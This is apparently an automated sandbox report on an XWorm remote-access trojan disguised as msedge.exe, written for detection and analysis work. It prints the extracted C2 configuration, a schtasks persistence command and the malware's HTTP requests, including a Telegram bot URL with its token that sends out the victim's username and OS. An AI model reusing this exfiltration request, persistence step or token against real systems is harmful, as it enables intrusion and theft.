Source: Amcache.hve.14.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.14.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.14.dr	Binary or memory string: vmci.syshbin`
Source: msedge.exe, 00000000.00000002.3561333873.000000001B980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWiv%SystemRoot%\system32\mswsock.dll<workflowInstanceQueries>
Source: Amcache.hve.14.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.14.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.14.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\msedge.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Users\user\Desktop\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe

Memory allocated: page read and write | page guard

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\msedge.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"

Jump to behavior

Source: msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002E03000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002E03000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002E03000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002E03000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2y
Source: msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002E03000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\msedge.exe	Queries volume information: C:\Users\user\Desktop\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Queries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Queries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Queries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Queries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Queries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: msedge.exe PID: 6924, type: MEMORYSTR

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.14.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: msedge.exe, 00000000.00000002.3550693887.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3561333873.000000001BA5E000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3563369376.000000001C0F3000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3550693887.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: msedge.exe, type: SAMPLE
Source: Yara match	File source: 0.0.msedge.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129fe4f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129d9ac0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.12a22f30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.12a22f30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1649838648.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 6924, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: msedge.exe, type: SAMPLE
Source: Yara match	File source: 0.0.msedge.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129fe4f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129d9ac0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.12a22f30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.12a22f30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1649838648.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 6924, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.20.3.235	pastebin.com	United States	13335	CLOUDFLARENETUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
91.134.9.160	i.ibb.co	France	16276	OVHFR	false
147.185.221.24	upon-forming.gl.at.ply.gg	United States	12087	SALSGIVERUS	true

Contacted Domains

Name	IP	Active
api.telegram.org	149.154.167.220	true
upon-forming.gl.at.ply.gg	147.185.221.24	true
pastebin.com	104.20.3.235	true
i.ibb.co	91.134.9.160	true

Contacted URLs

Name	Malicious	Reputation
https://pastebin.com/raw/ZnhxAV6a	false	high
https://i.ibb.co/Dwrj41N/Image.png	false	high
https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888&text=%E2%98%A0%20%5BWizWorm%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4C67EC226C1C2FB3C434%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro	false	high

AV Detection

Antivirus / Scanner detection for submitted sample

Source: msedge.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\msedge.exe

Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: msedge.exe

Malware Configuration Extractor: Xworm {"C2 url": ["https://pastebin.com/raw/ZnhxAV6a"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\msedge.exe

ReversingLabs: Detection: 78%

Multi AV Scanner detection for submitted file

Source: msedge.exe

ReversingLabs: Detection: 78%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\msedge.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: msedge.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: msedge.exe	String decryptor: https://pastebin.com/raw/ZnhxAV6a
Source: msedge.exe	String decryptor: <123456789>
Source: msedge.exe	String decryptor: <Xwormmm>
Source: msedge.exe	String decryptor: USB.exe

Uses 32bit PE files

Source: msedge.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49955 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49961 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50005 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50012 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50025 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50037 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50043 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50049 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50054 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50062 version: TLS 1.2

Source: msedge.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Xml.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.pdb@w^ source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: .pdb. source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdbHm source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: symbols\dll\mscorlib.pdbpdb` source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Xml.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: 0C:\Windows\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Core.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\msedge.PDB7 source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: msedge.exe, 00000000.00000002.3561333873.000000001B980000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0F3000.00000004.00000020.00020000.00000000.sdmp, WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Drawing.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Management.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: mscorlib.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: msedge.exe, 00000000.00000002.3561333873.000000001B980000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: indoC:\Windows\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.pdbx source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Xml.pdbhG source: WER1A3A.tmp.dmp.14.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49732 -> 147.185.221.24:3865
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49822 -> 147.185.221.24:3865

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://pastebin.com/raw/ZnhxAV6a

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: msedge.exe, type: SAMPLE
Source: Yara match	File source: 0.0.msedge.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.12a22f30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49732 -> 147.185.221.24:3865

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /raw/ZnhxAV6a HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888&text=%E2%98%A0%20%5BWizWorm%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4C67EC226C1C2FB3C434%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 147.185.221.24 147.185.221.24

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SALSGIVERUS SALSGIVERUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /raw/ZnhxAV6a HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888&text=%E2%98%A0%20%5BWizWorm%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4C67EC226C1C2FB3C434%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
